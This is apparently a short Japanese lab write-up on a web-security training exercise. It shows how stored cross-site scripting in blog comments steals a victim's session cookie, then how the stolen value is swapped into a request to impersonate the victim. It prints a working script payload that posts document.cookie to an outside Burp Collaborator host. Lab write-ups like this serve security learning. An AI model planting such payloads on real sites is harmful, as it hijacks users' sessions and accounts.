Hello there, ('ω')ノ
クロスサイトスクリプティングを利用してCookieを盗むを。
このラボは、ブログのコメント機能に脆弱性があって。
被害者は、すべてのコメントを表示する際に脆弱性が悪用されて。
被害者のセッションCookieを盗み出して、それを使用して被害者になりすまして。
コラボレータを起動して、ペイロードをコピーして。
下記のスクリプトを投稿して。
このスクリプトで、コメントを表示するすべての人にPOSTリクエストを発行させて。
コラボレータのリクエストは、Cookieの値が含まれて。
<script>
fetch('https://i9syryql3m1s4p4r5bvit4lwvn1dp2.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
投稿されたことを確認して。
HTTPインタラクションが表示されると。
リクエストにある被害者のCookieの値を取得して。
tGK0ZVaLut6i9zpDu8psnyLhbLmnJ38W
インターセプトをオンにして、Homeへアクセスして。
コラボレータで取得したCookieの値と入れ替えて。
クリアできた。
Best regards, (^^ゞ